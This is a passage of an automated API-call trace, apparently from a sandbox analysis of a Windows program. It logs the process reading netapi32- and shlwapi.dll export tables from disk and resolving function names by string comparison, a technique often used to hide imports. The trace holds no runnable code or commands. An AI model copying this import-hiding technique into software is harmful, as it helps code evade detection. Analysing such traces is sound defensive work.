lpString2="I_NetLogonSamLogoff") returned 1 [0178.238] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogon") returned 1 [0178.238] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonEx") returned 1 [0178.238] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0178.238] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSendToSam") returned 1 [0178.238] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogoff") returned 1 [0178.238] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogon") returned 1 [0178.238] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate") returned 1 [0178.238] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate2") returned 1 [0178.238] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate3") returned 1 [0178.238] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerGetTrustInfo") returned 1 [0178.238] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordGet") returned 1 [0178.238] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet") returned 1 [0178.239] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet2") returned 1 [0178.239] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerReqChallenge") returned 1 [0178.239] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBits") returned 1 [0178.239] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0178.239] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0178.239] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeClientDigest") returned 1 [0178.239] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeServerDigest") returned 1 [0178.239] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessAdd") returned 1 [0178.239] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessDel") returned 1 [0178.239] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessEnum") returned 0 [0178.239] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavAddConnection") returned 1 [0178.239] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavDeleteConnection") returned 1 [0178.239] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavFlushFile") returned 1 [0178.239] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetExtendedError") returned 1 [0178.239] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetHTTPFromUNCPath") returned 1 [0178.239] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetUNCFromHTTPPath") returned 1 [0178.239] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesA") returned 1 [0178.239] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExA") returned 1 [0178.239] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExW") returned 1 [0178.244] GetProcessHeap () returned 0x580000 [0178.244] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x2cf5030 | out: hHeap=0x580000) returned 1 [0178.244] GetProcessHeap () returned 0x580000 [0178.244] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x10) returned 0x599120 [0178.244] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x7ffc5e7b0000 [0178.244] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0178.244] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0178.244] GetModuleFileNameA (in: hModule=0x7ffc5e7b0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0178.244] CreateFileA (lpFileName="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0178.245] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0178.245] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0178.245] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=332104) returned 1 [0178.245] GetProcessHeap () returned 0x580000 [0178.245] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x51148) returned 0x2cf5030 [0178.245] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0178.245] ReadFile (in: hFile=0x17c, lpBuffer=0x2cf5030, nNumberOfBytesToRead=0x51148, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2cf5030*, lpNumberOfBytesRead=0x14f5a4*=0x51148, lpOverlapped=0x0) returned 1 [0178.250] CloseHandle (hObject=0x17c) returned 1 [0178.250] lstrcmpA (lpString1="AssocCreate", lpString2="AssocCreate") returned 0 [0178.250] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocCreate") returned 1 [0178.250] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocGetPerceivedType") returned 0 [0178.250] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocCreate") returned 1 [0178.250] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocGetPerceivedType") returned 1 [0178.250] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocIsDangerous") returned 0 [0178.250] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocCreate") returned 1 [0178.251] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocGetPerceivedType") returned 1 [0178.251] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocIsDangerous") returned 1 [0178.251] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocQueryKeyA") returned 0 [0178.251] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocCreate") returned 1 [0178.251] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocGetPerceivedType") returned 1 [0178.251] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocIsDangerous") returned 1 [0178.251] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyA") returned 1 [0178.251] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyW") returned 0 [0178.251] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocCreate") returned 1 [0178.251] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocGetPerceivedType") returned 1 [0178.251] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocIsDangerous") returned 1 [0178.251] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyA") returned 1 [0178.251] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyW") returned 1 [0178.251] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryStringA") returned 0 [0178.251] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocCreate") returned 1 [0178.251] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocGetPerceivedType") returned 1 [0178.251] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocIsDangerous") returned 1 [0178.251] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyA") returned 1 [0178.251] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyW") returned 1 [0178.251] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringA") returned 1 [0178.251] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringByKeyA") returned 0 [0178.251] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocCreate") returned 1 [0178.251] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocGetPerceivedType") returned 1 [0178.251] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocIsDangerous") returned 1 [0178.251] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyA") returned 1 [0178.251] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyW") returned 1 [0178.251] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringA") returned 1 [0178.251] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyA") returned 1 [0178.251] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyW") returned 0 [0178.251] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocCreate") returned 1 [0178.251] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocGetPerceivedType") returned 1 [0178.251] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocIsDangerous") returned 1 [0178.251] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyA") returned 1 [0178.251] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyW") returned 1 [0178.251] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringA") returned 1 [0178.251] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0178.252] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0178.252] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringW") returned 0 [0178.252] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocCreate") returned 1 [0178.252] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocGetPerceivedType") returned 1 [0178.252] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocIsDangerous") returned 1 [0178.252] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyA") returned 1 [0178.252] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyW") returned 1 [0178.252] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringA") returned 1 [0178.252] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyA") returned 1 [0178.252] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyW") returned 1 [0178.252] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringW") returned 1 [0178.252] lstrcmpA (lpString1="ChrCmpIA", lpString2="ChrCmpIA") returned 0 [0178.252] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocCreate") returned 1 [0178.252] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocGetPerceivedType") returned 1 [0178.252] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocIsDangerous") returned 1 [0178.252] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyA") returned 1 [0178.252] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyW") returned 1 [0178.252] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringA") returned 1 [0178.252] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyA") returned 1 [0178.252] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyW") returned 1 [0178.252] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringW") returned 1 [0178.252] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIA") returned 1 [0178.252] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIW") returned 0 [0178.252] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocCreate") returned 1 [0178.252] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocGetPerceivedType") returned 1 [0178.252] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocIsDangerous") returned 1 [0178.252] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyA") returned 1 [0178.252] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyW") returned 1 [0178.252] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringA") returned 1 [0178.252] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyA") returned 1 [0178.252] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyW") returned 1 [0178.252] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringW") returned 1 [0178.252] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIA") returned 1 [0178.252] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIW") returned 1 [0178.252] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ColorAdjustLuma") returned 0 [0178.253] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocCreate") returned 1 [0178.253] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocGetPerceivedType") returned 1 [0178.253] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocIsDangerous") returned 1 [0178.253] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyA") returned 1 [0178.253] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyW") returned 1 [0178.253] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringA") returned 1 [0178.253] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyA") returned 1 [0178.253] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyW") returned 1 [0178.253] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringW") returned 1 [0178.253] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIA") returned 1 [0178.253] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIW") returned 1 [0178.253] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorAdjustLuma") returned 1 [0178.253] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorHLSToRGB") returned 0 [0178.253] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocCreate") returned 1 [0178.253] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocGetPerceivedType") returned 1 [0178.253] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocIsDangerous") returned 1 [0178.253] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyA") returned 1 [0178.253] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyW") returned 1 [0178.253] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringA") returned 1 [0178.253] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyA") returned 1 [0178.253] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyW") returned 1 [0178.253] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringW") returned 1 [0178.253] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIA") returned 1 [0178.253] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIW") returned 1 [0178.253] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorAdjustLuma") returned 1 [0178.253] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorHLSToRGB") returned 1 [0178.253] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorRGBToHLS") returned 0 [0178.253] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocCreate") returned 1 [0178.253] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocGetPerceivedType") returned 1 [0178.253] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocIsDangerous") returned 1 [0178.253] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyA") returned 1 [0178.254] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyW") returned 1 [0178.254] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringA") returned 1 [0178.254] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyA") returned 1 [0178.254] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyW") returned 1 [0178.254] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringW") returned 1 [0178.254] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIA") returned 1 [0178.254] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIW") returned 1 [0178.254] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorAdjustLuma") returned 1 [0178.254] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorHLSToRGB") returned 1 [0178.254] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorRGBToHLS") returned 1 [0178.254] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ConnectToConnectionPoint") returned 0 [0178.254] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocCreate") returned 1 [0178.254] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocGetPerceivedType") returned 1 [0178.254] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocIsDangerous") returned 1 [0178.254] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyA") returned 1 [0178.254] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyW") returned 1 [0178.254] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringA") returned 1 [0178.254] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyA") returned 1 [0178.254] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyW") returned 1 [0178.254] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringW") returned 1 [0178.254] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIA") returned 1 [0178.254] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIW") returned 1 [0178.254] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorAdjustLuma") returned 1 [0178.254] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorHLSToRGB") returned 1 [0178.254] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorRGBToHLS") returned 1 [0178.254] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ConnectToConnectionPoint") returned 1 [0178.254] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="DelayLoadFailureHook") returned 0 [0178.254] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocCreate") returned 1 [0178.254] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocGetPerceivedType") returned 1 [0178.254] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocIsDangerous") returned 1 [0178.254] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyA") returned 1 [0178.254] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyW") returned 1 [0178.254] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringA") returned 1 [0178.254] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyA") returned 1 [0178.254] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyW") returned 1 [0178.254] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringW") returned 1 [0178.255] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIA") returned 1 [0178.255] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIW") returned 1 [0178.255] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorAdjustLuma") returned 1 [0178.255] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorHLSToRGB") returned 1 [0178.255] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorRGBToHLS") returned 1 [0178.255] lstrcmpA (lpString1="DllGetClassObject", lpString2="ConnectToConnectionPoint") returned 1 [0178.255] lstrcmpA (lpString1="DllGetClassObject", lpString2="DelayLoadFailureHook") returned 1 [0178.255] lstrcmpA (lpString1="DllGetClassObject", lpString2="DllGetClassObject") returned 0 [0178.255] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocCreate") returned 1 [0178.255] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocGetPerceivedType") returned 1 [0178.255] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocIsDangerous") returned 1 [0178.255] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyA") returned 1 [0178.255] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyW") returned 1 [0178.255] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringA") returned 1 [0178.255] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyA") returned 1 [0178.255] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyW") returned 1 [0178.255] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringW") returned 1 [0178.255] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIA") returned 1 [0178.255] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIW") returned 1 [0178.255] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorAdjustLuma") returned 1 [0178.255] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorHLSToRGB") returned 1 [0178.255] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorRGBToHLS") returned 1 [0178.255] lstrcmpA (lpString1="DllGetVersion", lpString2="ConnectToConnectionPoint") returned 1 [0178.255] lstrcmpA (lpString1="DllGetVersion", lpString2="DelayLoadFailureHook") returned 1 [0178.255] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetClassObject") returned 1 [0178.255] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetVersion") returned 0 [0178.255] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocCreate") returned 1 [0178.256] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocGetPerceivedType") returned 1 [0178.256] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocIsDangerous") returned 1 [0178.256] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyA") returned 1 [0178.256] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyW") returned 1 [0178.256] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringA") returned 1 [0178.256] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0178.256] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0178.256] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringW") returned 1 [0178.256] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIA") returned 1 [0178.256] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIW") returned 1 [0178.256] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorAdjustLuma") returned 1 [0178.256] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorHLSToRGB") returned 1 [0178.256] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorRGBToHLS") returned 1 [0178.256] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ConnectToConnectionPoint") returned 1 [0178.256] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DelayLoadFailureHook") returned 1 [0178.256] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetClassObject") returned 1 [0178.256] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetVersion") returned 1 [0178.256] lstrcmpA (lpString1="GUIDFromStringW", lpString2="GUIDFromStringW") returned 0 [0178.256] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocCreate") returned 1 [0178.256] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocGetPerceivedType") returned 1 [0178.256] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocIsDangerous") returned 1 [0178.256] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyA") returned 1 [0178.256] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyW") returned 1 [0178.256] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringA") returned 1 [0178.256] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyA") returned 1 [0178.256] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyW") returned 1 [0178.256] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringW") returned 1 [0178.256] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIA") returned 1 [0178.256] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIW") returned 1 [0178.256] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorAdjustLuma") returned 1 [0178.256] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorHLSToRGB") returned 1 [0178.378] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorRGBToHLS") returned 1 [0178.379] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ConnectToConnectionPoint") returned 1 [0178.379] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DelayLoadFailureHook") returned 1 [0178.379] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetClassObject") returned 1 [0178.379] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetVersion") returned 1 [0178.379] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GUIDFromStringW") returned -1 [0178.379] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GetAcceptLanguagesA") returned 0 [0178.379] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocCreate") returned 1 [0178.379] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocGetPerceivedType") returned 1 [0178.379] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocIsDangerous") returned 1 [0178.379] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyA") returned 1 [0178.379] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyW") returned 1 [0178.379] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringA") returned 1 [0178.379] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyA") returned 1 [0178.379] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyW") returned 1 [0178.379] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringW") returned 1 [0178.379] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIA") returned 1 [0178.379] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIW") returned 1 [0178.379] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorAdjustLuma") returned 1 [0178.379] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorHLSToRGB") returned 1 [0178.379] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorRGBToHLS") returned 1 [0178.379] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ConnectToConnectionPoint") returned 1 [0178.379] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DelayLoadFailureHook") returned 1 [0178.379] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetClassObject") returned 1 [0178.379] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetVersion") returned 1 [0178.380] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GUIDFromStringW") returned -1 [0178.380] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesA") returned 1 [0178.380] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesW") returned 0 [0178.380] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocCreate") returned 1 [0178.380] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocGetPerceivedType") returned 1 [0178.380] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocIsDangerous") returned 1 [0178.380] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyA") returned 1 [0178.380] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyW") returned 1 [0178.380] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringA") returned 1 [0178.380] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyA") returned 1 [0178.380] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyW") returned 1 [0178.380] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringW") returned 1 [0178.380] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIA") returned 1 [0178.380] 